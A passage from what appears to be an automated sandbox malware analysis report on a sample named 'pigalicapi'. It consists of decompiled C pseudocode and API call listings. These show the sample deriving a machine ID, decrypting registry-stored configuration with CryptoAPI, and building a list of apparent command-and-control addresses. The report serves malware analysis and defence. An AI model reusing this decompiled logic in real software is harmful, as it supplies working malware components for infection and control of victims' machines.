                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 01174617
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0117463E
                                                                                                                                                                                                                                                                              • Part of subcall function 011747F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0117482A
                                                                                                                                                                                                                                                                              • Part of subcall function 011747F0: GetLastError.KERNEL32 ref: 01174834
                                                                                                                                                                                                                                                                              • Part of subcall function 011747F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01174850
                                                                                                                                                                                                                                                                              • Part of subcall function 011747F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 011748EB
                                                                                                                                                                                                                                                                              • Part of subcall function 011747F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0117490B
                                                                                                                                                                                                                                                                              • Part of subcall function 011747F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0117493C
                                                                                                                                                                                                                                                                              • Part of subcall function 011747F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0117496F
                                                                                                                                                                                                                                                                              • Part of subcall function 011747F0: CryptDestroyKey.ADVAPI32(00000000), ref: 01174982
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0117468F
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 011747C0
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 011747E0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2585753175-0
                                                                                                                                                                                                                                                                            • Opcode ID: e713f8e965a16fb41db9c7d9fda5fb42c7d61d6bc9130696975a018e19d62764
                                                                                                                                                                                                                                                                            • Instruction ID: 27115ee60dbab1c8d6636b9132f9c8923a29de85077ca74161d94b5f929b8e28
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e713f8e965a16fb41db9c7d9fda5fb42c7d61d6bc9130696975a018e19d62764
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B811C75A01A28DBDB28CB54DC94BAABBB5AF49306F0091D9E508AB3C1D7749BC1CF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                                                                            			E01179D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				char _v292;
                                                                                                                                                                                                                                                                            				intOrPtr _v296;
                                                                                                                                                                                                                                                                            				char _v404;
                                                                                                                                                                                                                                                                            				long _v408;
                                                                                                                                                                                                                                                                            				char _v673;
                                                                                                                                                                                                                                                                            				char _v676;
                                                                                                                                                                                                                                                                            				intOrPtr _v680;
                                                                                                                                                                                                                                                                            				long _v684;
                                                                                                                                                                                                                                                                            				signed int _v688;
                                                                                                                                                                                                                                                                            				short* _v692;
                                                                                                                                                                                                                                                                            				signed int _v696;
                                                                                                                                                                                                                                                                            				unsigned int _v700;
                                                                                                                                                                                                                                                                            				intOrPtr _v704;
                                                                                                                                                                                                                                                                            				char _v900;
                                                                                                                                                                                                                                                                            				signed int _v904;
                                                                                                                                                                                                                                                                            				signed int _v908;
                                                                                                                                                                                                                                                                            				int _v912;
                                                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                                                                            				short** _t76;
                                                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0x20;
                                                                                                                                                                                                                                                                            					_v24 = 6;
                                                                                                                                                                                                                                                                            					_v684 = 0;
                                                                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                                                                            					_v408 = 0;
                                                                                                                                                                                                                                                                            					_v16 = 0x19660d;
                                                                                                                                                                                                                                                                            					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                                            					_v680 = _a4;
                                                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                                            						_v673 = 0;
                                                                                                                                                                                                                                                                            						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                                            						if(_t71 != 0) {
                                                                                                                                                                                                                                                                            							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                                            							E01177D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                                            							_v700 = 0;
                                                                                                                                                                                                                                                                            							_t74 = E01179F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                                            							if(_t74 != 0) {
                                                                                                                                                                                                                                                                            								_v904 = 0;
                                                                                                                                                                                                                                                                            								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                                            									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                                            									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v696 = _v684;
                                                                                                                                                                                                                                                                            							_v908 = 0;
                                                                                                                                                                                                                                                                            							while(_v908 < 4) {
                                                                                                                                                                                                                                                                            								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                                            								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                                            								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t76 =  &_v692;
                                                                                                                                                                                                                                                                            							__imp__StringFromCLSID(_a4, _t76); // executed
                                                                                                                                                                                                                                                                            							_v704 = _t76;
                                                                                                                                                                                                                                                                            							if(_v704 >= 0) {
                                                                                                                                                                                                                                                                            								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                                            								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                                            								_v5 = 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}





























                                                                                                                                                                                                                                                                            0x01179d29
                                                                                                                                                                                                                                                                            0x01179d31
                                                                                                                                                                                                                                                                            0x01179d4b
                                                                                                                                                                                                                                                                            0x01179d52
                                                                                                                                                                                                                                                                            0x01179d59
                                                                                                                                                                                                                                                                            0x01179d63
                                                                                                                                                                                                                                                                            0x01179d6a
                                                                                                                                                                                                                                                                            0x01179d74
                                                                                                                                                                                                                                                                            0x01179d7b
                                                                                                                                                                                                                                                                            0x01179d88
                                                                                                                                                                                                                                                                            0x01179da2
                                                                                                                                                                                                                                                                            0x01179da8
                                                                                                                                                                                                                                                                            0x01179ddd
                                                                                                                                                                                                                                                                            0x01179de5
                                                                                                                                                                                                                                                                            0x01179deb
                                                                                                                                                                                                                                                                            0x01179e03
                                                                                                                                                                                                                                                                            0x01179e0b
                                                                                                                                                                                                                                                                            0x01179e28
                                                                                                                                                                                                                                                                            0x01179e32
                                                                                                                                                                                                                                                                            0x01179e34
                                                                                                                                                                                                                                                                            0x01179e4f
                                                                                                                                                                                                                                                                            0x01179e73
                                                                                                                                                                                                                                                                            0x01179e49
                                                                                                                                                                                                                                                                            0x01179e49
                                                                                                                                                                                                                                                                            0x01179e4f
                                                                                                                                                                                                                                                                            0x01179e81
                                                                                                                                                                                                                                                                            0x01179e87
                                                                                                                                                                                                                                                                            0x01179ea2
                                                                                                                                                                                                                                                                            0x01179ecf
                                                                                                                                                                                                                                                                            0x01179ee4
                                                                                                                                                                                                                                                                            0x01179e9c
                                                                                                                                                                                                                                                                            0x01179e9c
                                                                                                                                                                                                                                                                            0x01179eec
                                                                                                                                                                                                                                                                            0x01179ef7
                                                                                                                                                                                                                                                                            0x01179efd
                                                                                                                                                                                                                                                                            0x01179f0a
                                                                                                                                                                                                                                                                            0x01179f2b
                                                                                                                                                                                                                                                                            0x01179f46
                                                                                                                                                                                                                                                                            0x01179f4c
                                                                                                                                                                                                                                                                            0x01179f4c
                                                                                                                                                                                                                                                                            0x01179f57
                                                                                                                                                                                                                                                                            0x01179f57
                                                                                                                                                                                                                                                                            0x01179de5
                                                                                                                                                                                                                                                                            0x01179da2
                                                                                                                                                                                                                                                                            0x01179f63

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 01179D9A
                                                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 01179DDD
                                                                                                                                                                                                                                                                              • Part of subcall function 01179F70: GetAdaptersInfo.IPHLPAPI(00000000,01179E2D), ref: 01179FEB
                                                                                                                                                                                                                                                                            • StringFromCLSID.OLE32(00000020,?), ref: 01179EF7
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 01179F25
                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 01179F46
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 01179F57
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: 5dcd7d336e295c58fa8c4523089caeaea67ed76d2fcbccc18345decf10a42623
                                                                                                                                                                                                                                                                            • Instruction ID: f94f695d618a132a93286e12fd69bab8c1f3203ae812a23b8f792b58631890b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dcd7d336e295c58fa8c4523089caeaea67ed76d2fcbccc18345decf10a42623
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F5149719003299FDB29CF54CC88BEABBB9BB45314F1482D9E51D6A384DB709B88CF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01171390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				signed char* _v8;
                                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                                                            				long _v32;
                                                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                                                            				signed int _t57;
                                                                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t52 = __eax;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v24 = 0;
                                                                                                                                                                                                                                                                            					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                                            					_v28 = _t57;
                                                                                                                                                                                                                                                                            					if(_v28 != 0) {
                                                                                                                                                                                                                                                                            						E01177B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                                            						E01177B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                                            						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                                            						_v8 = _v28;
                                                                                                                                                                                                                                                                            						_v20 = 3;
                                                                                                                                                                                                                                                                            						while(_v20 == 3) {
                                                                                                                                                                                                                                                                            							_v32 = 0;
                                                                                                                                                                                                                                                                            							while(_v32 < 4) {
                                                                                                                                                                                                                                                                            								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                                            									_t76 = E01171500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                                            									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                            									if(_t76 >= 0) {
                                                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                                            								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                            								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t64 = E01171580( &_v16,  &_v12);
                                                                                                                                                                                                                                                                            							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                                            							_v20 = _t64;
                                                                                                                                                                                                                                                                            							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                                            								E01177B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                                            								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                                            								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                                            								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                                            								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						HeapFree(GetProcessHeap(), 0, _v28);
                                                                                                                                                                                                                                                                            						return _v24;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                                                            0x01171390
                                                                                                                                                                                                                                                                            0x0117139a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011713b6
                                                                                                                                                                                                                                                                            0x011713b6
                                                                                                                                                                                                                                                                            0x011713cd
                                                                                                                                                                                                                                                                            0x011713d3
                                                                                                                                                                                                                                                                            0x011713da
                                                                                                                                                                                                                                                                            0x011713f0
                                                                                                                                                                                                                                                                            0x01171406
                                                                                                                                                                                                                                                                            0x0117140b
                                                                                                                                                                                                                                                                            0x01171411
                                                                                                                                                                                                                                                                            0x01171414
                                                                                                                                                                                                                                                                            0x0117141b
                                                                                                                                                                                                                                                                            0x01171425
                                                                                                                                                                                                                                                                            0x01171437
                                                                                                                                                                                                                                                                            0x0117143d
                                                                                                                                                                                                                                                                            0x0117144f
                                                                                                                                                                                                                                                                            0x01171454
                                                                                                                                                                                                                                                                            0x01171459
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171461
                                                                                                                                                                                                                                                                            0x01171461
                                                                                                                                                                                                                                                                            0x0117146e
                                                                                                                                                                                                                                                                            0x01171478
                                                                                                                                                                                                                                                                            0x01171434
                                                                                                                                                                                                                                                                            0x01171434
                                                                                                                                                                                                                                                                            0x01171485
                                                                                                                                                                                                                                                                            0x0117148a
                                                                                                                                                                                                                                                                            0x0117148d
                                                                                                                                                                                                                                                                            0x01171496
                                                                                                                                                                                                                                                                            0x011714bc
                                                                                                                                                                                                                                                                            0x011714c1
                                                                                                                                                                                                                                                                            0x011714ca
                                                                                                                                                                                                                                                                            0x011714d3
                                                                                                                                                                                                                                                                            0x011714dc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011714dc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011714ab
                                                                                                                                                                                                                                                                            0x011714f1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011714f7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011713dc

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 011713C6
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 011713CD
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0117149E
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 011714A5
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011714EA
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 011714F1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                            • String ID: ====
                                                                                                                                                                                                                                                                            • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                                            • Opcode ID: e2d02d75772cc1f3e70c6cff3883337f7b5f20073943864c2e509ab95cc473b4
                                                                                                                                                                                                                                                                            • Instruction ID: 6ebf282428cf0d9ac50e6f0f39f62ff5614206a5a9d9196d34a6c818bf58dd2f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2d02d75772cc1f3e70c6cff3883337f7b5f20073943864c2e509ab95cc473b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D64151B5D0010AEFCF18CFA8D844BEE7BB5BF45319F148619E516A7381D7349A44CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                                                            			E01177970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				void* _v40;
                                                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					_v16 = 0x8c;
                                                                                                                                                                                                                                                                            					_v20 = 0x75bc;
                                                                                                                                                                                                                                                                            					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t50;
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_t72 =  *0x117e28c; // 0x1183f88
                                                                                                                                                                                                                                                                            						_t83 =  *0x11818a0; // 0x1183b88
                                                                                                                                                                                                                                                                            						_t52 = E0117A400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                                            						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                                            						_v24 = _t52;
                                                                                                                                                                                                                                                                            						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                                            							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                                            							_t58 = E01178A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x11830e8, 0x254);
                                                                                                                                                                                                                                                                            							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                                            							if(_t58 != 0) {
                                                                                                                                                                                                                                                                            								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                                            								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                                            								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
                                                                                                                                                                                                                                                                            								if(_v40 != 0) {
                                                                                                                                                                                                                                                                            									_v48 = 0;
                                                                                                                                                                                                                                                                            									while(_v48 < _v36) {
                                                                                                                                                                                                                                                                            										_t64 = E01177B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                                            										_push(_v44);
                                                                                                                                                                                                                                                                            										L0117B1EC();
                                                                                                                                                                                                                                                                            										_v52 = _t64;
                                                                                                                                                                                                                                                                            										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                            										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                                            										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									 *_a4 = _v40;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                                                            0x01177976
                                                                                                                                                                                                                                                                            0x01177981
                                                                                                                                                                                                                                                                            0x01177987
                                                                                                                                                                                                                                                                            0x0117798e
                                                                                                                                                                                                                                                                            0x011779a3
                                                                                                                                                                                                                                                                            0x011779a9
                                                                                                                                                                                                                                                                            0x011779b0
                                                                                                                                                                                                                                                                            0x011779bf
                                                                                                                                                                                                                                                                            0x011779c6
                                                                                                                                                                                                                                                                            0x011779cd
                                                                                                                                                                                                                                                                            0x011779d2
                                                                                                                                                                                                                                                                            0x011779d5
                                                                                                                                                                                                                                                                            0x011779df
                                                                                                                                                                                                                                                                            0x011779ed
                                                                                                                                                                                                                                                                            0x01177a10
                                                                                                                                                                                                                                                                            0x01177a15
                                                                                                                                                                                                                                                                            0x01177a1a
                                                                                                                                                                                                                                                                            0x01177a29
                                                                                                                                                                                                                                                                            0x01177a38
                                                                                                                                                                                                                                                                            0x01177a51
                                                                                                                                                                                                                                                                            0x01177a58
                                                                                                                                                                                                                                                                            0x01177a5a
                                                                                                                                                                                                                                                                            0x01177a6c
                                                                                                                                                                                                                                                                            0x01177a84
                                                                                                                                                                                                                                                                            0x01177a8f
                                                                                                                                                                                                                                                                            0x01177a90
                                                                                                                                                                                                                                                                            0x01177a95
                                                                                                                                                                                                                                                                            0x01177abc
                                                                                                                                                                                                                                                                            0x01177ac2
                                                                                                                                                                                                                                                                            0x01177acb
                                                                                                                                                                                                                                                                            0x01177a69
                                                                                                                                                                                                                                                                            0x01177a69
                                                                                                                                                                                                                                                                            0x01177ad6
                                                                                                                                                                                                                                                                            0x01177ad6
                                                                                                                                                                                                                                                                            0x01177a58
                                                                                                                                                                                                                                                                            0x01177a1a
                                                                                                                                                                                                                                                                            0x01177ae3
                                                                                                                                                                                                                                                                            0x01177ae3
                                                                                                                                                                                                                                                                            0x011779b0
                                                                                                                                                                                                                                                                            0x01177aef

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 011779A3
                                                                                                                                                                                                                                                                              • Part of subcall function 0117A400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0117A45C
                                                                                                                                                                                                                                                                              • Part of subcall function 0117A400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0117A480
                                                                                                                                                                                                                                                                              • Part of subcall function 0117A400: RegCloseKey.KERNEL32(00000000), ref: 0117A494
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01177AE3
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 01178AD3
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: GetLastError.KERNEL32 ref: 01178ADD
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01178B0C
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 01178B37
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 01178B5E
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 01178B7A
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptDestroyKey.ADVAPI32(00000000), ref: 01178B87
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptDestroyKey.ADVAPI32(00000000), ref: 01178B91
                                                                                                                                                                                                                                                                              • Part of subcall function 01178A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178B9D
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 01177A4B
                                                                                                                                                                                                                                                                            • inet_ntoa.WS2_32(?), ref: 01177A90
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 01177ABC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                            • String ID: %s:%u$Lyoxokxeruqp
                                                                                                                                                                                                                                                                            • API String ID: 1891311255-1376685685
                                                                                                                                                                                                                                                                            • Opcode ID: ef91c748519bf4a509536674f74aef0b277bba7a60ac172d65429c5c71c59ae9
